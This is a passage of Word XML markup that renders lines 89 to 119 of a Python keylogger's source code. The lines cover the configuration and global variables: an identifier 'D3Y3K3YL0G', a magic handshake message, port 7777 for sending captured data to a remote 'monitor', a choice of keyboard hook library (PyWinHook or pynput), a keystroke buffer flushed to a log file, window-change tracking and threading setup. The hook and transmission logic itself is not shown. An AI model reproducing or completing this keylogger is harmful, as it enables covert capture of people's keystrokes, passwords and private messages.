        </w:rPr>
        <w:t>0.1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="436" w:name="l89"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">89   </w:t>
      </w:r>
      <w:bookmarkEnd w:id="436"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># Message received to identify the Monitor.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="437" w:name="l90"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">90   </w:t>
      </w:r>
      <w:bookmarkEnd w:id="437"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">MAGIC_MESSAGE </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s41"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>'4ScauMiJcywpjAO/OfC2xLGsha45KoX5AhKR7O6T+Iw='</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="438" w:name="l91"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">91   </w:t>
      </w:r>
      <w:bookmarkEnd w:id="438"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">DEMONS_EYE_ID </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s41"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">'D3Y3K3YL0G'            </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># Identifier for the monitor to recognize the keylogger</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="439" w:name="l92"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">92   </w:t>
      </w:r>
      <w:bookmarkEnd w:id="439"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">DEFAULT_MONITOR_PORT </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s61"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">7777             </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># Monitor port where to send data</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="440" w:name="l93"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">93   </w:t>
      </w:r>
      <w:bookmarkEnd w:id="440"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">MONITOR_SOCKET_TIMEOUT </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s61"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">3              </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># Timeout socket connection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="441" w:name="l94"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">94   </w:t>
      </w:r>
      <w:bookmarkEnd w:id="441"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">MAGIC_RESPONSE </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">DEMONS_EYE_ID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p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="442" w:name="l95"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">95   </w:t>
      </w:r>
      <w:bookmarkEnd w:id="442"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">ENCODING </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s41"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>'utf-8'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="443" w:name="l96"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">96   </w:t>
      </w:r>
      <w:bookmarkEnd w:id="443"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="444" w:name="l97"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">97   </w:t>
      </w:r>
      <w:bookmarkEnd w:id="444"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># Hooking method</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="445" w:name="l98"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">98   </w:t>
      </w:r>
      <w:bookmarkEnd w:id="445"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">HOOK_PYWINHOOK  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s61"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">0                     </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># Module PyWinHook</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="446" w:name="l99"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">99   </w:t>
      </w:r>
      <w:bookmarkEnd w:id="446"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">HOOK_PYNPUT     </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s61"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">1                     </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># Module pynput</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="447" w:name="l100"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">100  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="447"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="448" w:name="l101"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">101  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="448"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="449" w:name="l102"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">102  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="449"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>########################################################</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="450" w:name="l103"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">103  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="450"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># GLOBAL VARIABLES</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="451" w:name="l104"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">104  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="451"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>########################################################</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="452" w:name="l105"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">105  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="452"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">key_counter </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s61"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">0     </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># key counter</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="453" w:name="l106"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">106  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="453"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">old_event </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">= None    </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># Previous event control. Used to detect when the user changes the window or application.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="454" w:name="l107"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">107  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="454"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="455" w:name="l108"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">108  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="455"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># Character buffer. Until it is full, it is not written to the file on disk, in this way continuous writes to disk</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="456" w:name="l109"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">109  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="456"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># are avoided for each key pressed. When the args.keyminchars limit is exceeded the buffer is written to disk.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="457" w:name="l110"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">110  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="457"/>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58" w:name="l111"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">111  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="458"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="459" w:name="l112"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">112  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="459"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># Path and file name of keylogger data file. The name is assigned in the create_keylog_file() function.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="460" w:name="l113"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">113  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="460"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># Also use the constants KLGPRE and KLGEXT</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="461" w:name="l114"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">114  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="461"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">keylog_nam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62" w:name="l115"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">115  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="462"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="463" w:name="l116"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">116  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="463"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># Threads control</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="464" w:name="l117"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">117  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="464"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">threadLock </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>threading</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>Lock</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="465" w:name="l118"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">118  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="465"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">threadList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466" w:name="l119"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">119  </w:t>
